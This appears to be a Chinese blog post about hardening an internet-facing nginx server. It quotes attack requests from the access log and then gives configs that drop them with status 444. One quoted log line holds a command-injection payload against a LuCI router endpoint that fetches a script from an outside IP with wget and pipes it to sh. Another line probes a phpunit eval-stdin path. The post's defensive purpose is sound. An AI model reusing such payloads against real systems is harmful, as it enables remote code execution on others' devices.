最近将一台HTTP服务器暴露于仅见,随即引来大量黑客的光顾,其实也就是发各种HTTP请求,以获取一个输入,输出界面,在输入界面输入SHELL命令,在输出界面观看结果,也就是说不用去到电脑前,用登录用户名和密码这种方法来登录,再跑各种命令。
日志显示有下面这些操作:
185.191.127.212 - - [19/Jun/2024:21:10:22 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) HTTP/1.1" 444 0 "-" "Go-http-client/1.1" "-"
60.221.228.127 - - [15/Jun/2024:21:10:02 +0800] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 444 0 "-" "Custom-AsyncHttpClient" "-"
于是在NGINX上加上相应规则,遇到类似的直接返回444
其中/etc/nginx/conf/nginx.conf
user nginx;
worker_processes auto;
error_log /var/log/nginx/error.log notice;
pid /var/run/nginx.pid;
events {
worker_connections 1024;
}
http {
#include /etc/nginx/mime.types;
#default_type application/octet-stream;
#paul-1
server_tokens off;
map $remote_addr $loggable {
~^192\.168\.1 0; # 如果IP以192开头,则不记录日志
~^219\.888\.888\.888 0; # 如果IP是219.888.888.8,则不记录日志
default 1; # 其他情况默认记录日志
}
log_format main '$remote_addr - $remote_user [$time_local] "$request" '
'$status $body_bytes_sent "$http_referer" '
'"$http_user_agent" "$http_x_forwarded_for"';
#paul-2
access_log /var/log/nginx/access.log main if=$loggable;#引用上面的规则
sendfile on;
#tcp_nopush on;
keepalive_timeout 65;
#gzip on;
include /etc/nginx/conf.d/*.conf;
map $http_upgrade $connection_upgrade {
default upgrade;
'' close;
}
upstream uvicorn {
server unix:/tmp/uvicorn.sock;
}
}
/etc/nginx/conf/conf.d/default.conf,这里是将请求转发后到后端的配置
server {
listen 81;
listen [::]:80;
#paul-3
server_name paulwong88.com;
#paul-4
# 验证 Host 头部是否为您的域名
if ($host != 'paulwong88.com') {
return 444; # 对非授权域名的请求直接关闭连接
}
client_max_body_size 4G;
#server_name localhost;
location / {
#include /etc/nginx/mime.types;
#default_type application/octet-stream;
add_header 'Cache-control' 'no-cache';
proxy_set_header Host $http_host;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection $connection_upgrade;
proxy_redirect off;
proxy_buffering off;
proxy_pass http://open-webui:8080;
}
#paul-5
location ~ ^/cgi-bin/ {
deny all;
return 444;# 限制对 CGI 目录的访问
}
}
/etc/nginx/conf/conf.d/default-web.conf,这里是放置静态页面的配置
server {
listen 80;
listen [::]:80;
expires -1;
#paul-3
server_name paulwong88.com;
#paul-4
# 验证 Host 头部是否为您的域名
if ($host != 'paulwong88.com') {
return 444; # 对非授权域名的请求直接关闭连接
}
client_max_body_size 4G;
#server_name localhost;
location / {
#如果不加,nginx会乱发http头,导致浏览器无法解析css,js这种文件
include /etc/nginx/mime.types; #默认在http中是有这个配置的,但又重复了一遍,告诉nginx如果碰到各种后缀,如.css,应如何添加http头
default_type application/octet-stream; #默认在http中是有这个配置的,但又重复了一遍,加默认要加的http头
root /usr/share/nginx/html;
index index.html index.htm;
}
#paul-5
location ~ ^/cgi-bin/ {
deny all;
return 444;# 限制对 CGI 目录的访问
}
#location /static {
# path for static files
#root /path/to/app/static;
#}
#网上建议这样加,但发现没效果
#location ~ \.css {
#root /usr/share/nginx/html;
#add_header Content-Type text/css;
#default_type text/css;
#}
#location ~ \.js {
#root /usr/share/nginx/html;
#add_header Content-Type application/x-javascript;
#}
}
这样基本各路黑客输入一条命令后,基本就打退堂鼓了。